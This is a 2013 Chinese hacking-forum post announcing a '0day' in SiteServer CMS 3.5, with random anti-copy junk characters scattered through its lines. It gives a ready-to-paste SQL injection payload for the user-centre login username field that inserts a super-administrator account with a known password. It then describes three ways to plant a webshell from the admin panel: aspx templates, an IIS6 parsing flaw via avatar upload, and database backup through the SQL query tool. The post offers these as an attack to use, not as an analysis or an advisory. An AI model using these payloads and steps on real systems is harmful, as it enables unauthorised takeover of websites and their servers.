找回密码
 立即注册
查看: 3045|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
* F/ U7 O, ?$ \, t' j+ o0 q& Q9 U
stieserver官网:www.siteserver.cn
) @$ [, F3 s) {: J$ L, C, H7 t6 K" @# r) V1 ~2 A+ h6 X# f
3 ?2 S" Z1 G9 H! d9 d; P, n

5 I' ]" b$ H# J( {EXP:
5 H' |$ ^7 D* d8 r" l) X2 P. `& s
2 G: A" ^; L4 X: y直接访问UserCenter/login.aspx9 [( a# ]  E! V# a1 e4 C8 y( p

; L3 z% Q0 f) w: {  X
; P6 {* ]6 f. Q) S" n) |3 m! M6 L; |0 d3 Z5 U
用户名处输入:
; B4 n- Y; e+ g# A
6 F6 r: R  l* L* i7 g123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
/ ]" X0 W2 e$ M; N! x- @
! U) Z7 P' C, N' \/ p  k' u! Y% m 0 i' G: R/ ^( h; l( E; m- k
+ Z" z* L2 T  O2 X8 W( }" H# |
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
% [1 P4 Q* F$ C8 E: ]# g( ^; @2 ~: m, T0 U; E# L9 A0 A

9 z) r1 R& \6 H
, Y/ K- G7 s2 W! t8 g& O" ?. k之后再访问后台SiteServer/login.aspx用插入的用户登陆3 q9 ^3 B. }; x3 Q, j% }
1 M9 S; \; \. Z0 W

! g6 m7 m& s4 M! w: f! t& U7 T: G5 l/ V* i; a. ]0 U+ d9 {
后台拿webshell的三种方法:8 t0 c% {+ O9 ^, G/ c, l
4 m1 \8 _9 L, J5 U
一、
- A+ B" e) E0 t- w' P6 H4 U  t8 o( f6 Q9 \' [, A% K7 r. c& P
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. K" X2 K& s0 q& g5 ?. r! [/ `
! K8 t0 p5 j' }- }7 i
二、  z  m/ R0 y( _5 ]. {5 z( `8 L

4 L  y) ]4 b6 Q+ i: R  ~! f成员权限-》添加用户-》用户名为:1.asp  ~5 ?& u! R# Y# b6 s

" B2 [$ W& Z7 l# N% Q" khttp://127.0.0.1/usercenter/
7 h7 I( T1 @# C: H& i# M
4 A- v' r: F- Y( J9 n# E用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
* f9 t6 m- F% ~$ A  Y- ^
$ p2 F2 `9 w2 _$ g2 ^; D(ps:后台添加用户时不会验证是否含有非法字符)
- I8 }2 [$ E: t/ {' W5 s* |! a% b9 ]2 }0 g
三、
) A% g* ]) ]- d# o! ^: p+ D' c% s- c
系统工具-》实用工具-》机器参数查看. |- G4 Z2 T3 c7 c7 t
可以看到数据库类型、名称,WEB路径
( q2 O& x3 p3 [  R7 g+ X1 u6 W1 F; ~$ h* Z4 \% ~" K
系统工具-》数据库工具-》SQL语句查询$ W+ }$ `0 k0 M; x) _8 w
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。- v7 }! c+ Y5 |

$ L& m' W+ m$ q* U2 q3 F  ], A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表